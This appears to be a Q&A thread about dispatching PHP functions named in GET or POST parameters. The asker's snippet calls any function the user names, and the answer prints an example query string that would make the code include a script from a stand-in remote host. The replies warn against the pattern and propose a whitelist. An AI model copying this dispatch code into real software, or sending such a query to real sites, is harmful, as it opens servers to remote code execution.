# Calling a PHP function with arguments from GET or POST

Tags: php, function, calling-convention

Say I have the following functions in the file `functions.php`:

```
function foo($baz, $qux = 2, $quux = 3){
    echo 'foo: $baz - $qux - $quux';
}

function bar($baz, $qux = 5, $quux = 6){
    echo 'bar: $baz - $qux - $quux';
}
```

Now I want to be able to call these functions using GET (or POST for that matter).
E.g.

- If I navigate to `/functions.php?call_func=foo&baz=1&qux=4`, this should print `foo: 1 - 4 - 3`,
- If I go to `/functions.php?call_func=bar&baz=7&quux=3`, it should print `bar: 7 - 5 - 3`.

Using a method like `call_user_func_array`, I would be able to achieve some of this functionality, but not all, as it cannot handle associative arrays. So I would envision something like (with proper security checks):

```
$function_name = $_GET['call_func'];
unset($_GET['call_func']);
call_user_func_array($function_name, $_GET);
```

But, this doesn't handle associative arrays, so the second example call (`/functions.php?call_func=bar&baz=7&quux=3`) would pass the `quux` argument to `qux` rather than `quux`.

Is there a correct way to call different functions from a GET or POST request?

Comment: Never use `call_user_func()` and similar functions using client side provided input. You can never trust client side data, never. You expose all of your internal logic, something that poses a security risk you cannot judge in the end.

Comment: This would require the query string to always have the parameters in the correct order, which is far from an ideal solution since anyone can send a request to your code with the arguments in what ever order they please, which is how query strings should work. You need to either fetch the data manually and pass them in into the array in the correct order, or the functions can accept an array and pick the correct data from it itself. This is however bad for other reasons (like losing code hints and it won't be clear what data the function needs.)

Answer (score 0):

First, your implementation is risky in terms of information security.
In this way any function can be called.
Just imagine what would happen if a malicious attacker sent

```
call_func=include&baz=http://evil-script&quux=null
```

The safest solution, and one that will also meet the requirements of your question, is to use a "white list", which will contain the functions that can be called, and what parameters they are allowed to accept